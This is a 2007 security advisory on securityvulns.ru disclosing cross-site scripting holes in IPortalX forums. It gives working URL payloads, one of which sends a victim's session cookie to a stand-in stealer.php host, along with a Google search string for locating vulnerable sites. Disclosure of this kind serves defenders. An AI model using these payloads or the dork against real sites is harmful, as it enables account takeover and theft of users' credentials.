Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  IPortalX Forums Cross-Site Scripting Vulnerability

  XZero Community Classifieds  <= v4.95.11 LFI & SQL Injection

  Blakord Portal <= Beta 1.3.A (all modules) Blind Sql Injection

  Confixx Professional RFİ

From:Hackers Center Security Group <DoZ_(at)_hackerscenter.com>
Date:27.12.2007
Subject:[HSC] IPortalX Forums Cross-Site Scriptin

[HSC] IPortalX Forums Cross-Site Scripting Vulnerability


IPortalX is prone to multiple cross-site scripting vulnerabilities because
it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in
the browser of an unsuspecting user in the context of the affected site.
This may allow the attacker to steal cookie-based authentication credentials
and to launch other attacks.



Hackers Center Security Group (http://www.hackerscenter.com)
Credit: Doz

Class: Input Validation Error
Remote: Yes

Product:IPortalX
Version: All
Vendor: http://www.iportalx.net/






Attackers can exploit these issues via a web client.


Search XSS:

/forum/login_user.asp?Redirect=/forum/search.
asp@KW=%22%3E%3Cscript%3Ealert(
document.cookie);%3C/script%3E

/forum/login_user.asp?Redirect=/members.
asp?SF=%22%3E%3Cscript%3Ealert(
document.cookie);%3C/script%3E


Getting Cookie:

Path/forum/login_user.asp?FID=0&Redirect=/login_user.asp?Redirect=/members.
asp?SF=%3Cscript%3Edocument.location=%22http://www.mysite/stealer.php?cookie=%22%20+%20docume
nt.cookie
;%3C/script%3E


Blog XSS:

/Path/blogs.
asp?CID=0&AID=0&Date=%22%3E%3Cscript%3Ealert(document
.cookie
);%3C/script%3E


Stack overflow: (using IE) - JS In .JPG uploaded to avatar.

http://img296.imageshack.us/img296/1318/hack1br6.jpg



Google Search:

http://www.google.com/search?hl=en&q=%2Fforum%2Flogin_user.asp%3F
Redirect%3D%2F&btnG=Google+Search




Only becoming an Ethical Hacker, you can stop a hacker. Were can you learn
with out
having to pay thousands!- http://kit.hackerscenter.com - The most
comprehensive
security pack you will ever find on the net!

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru
test server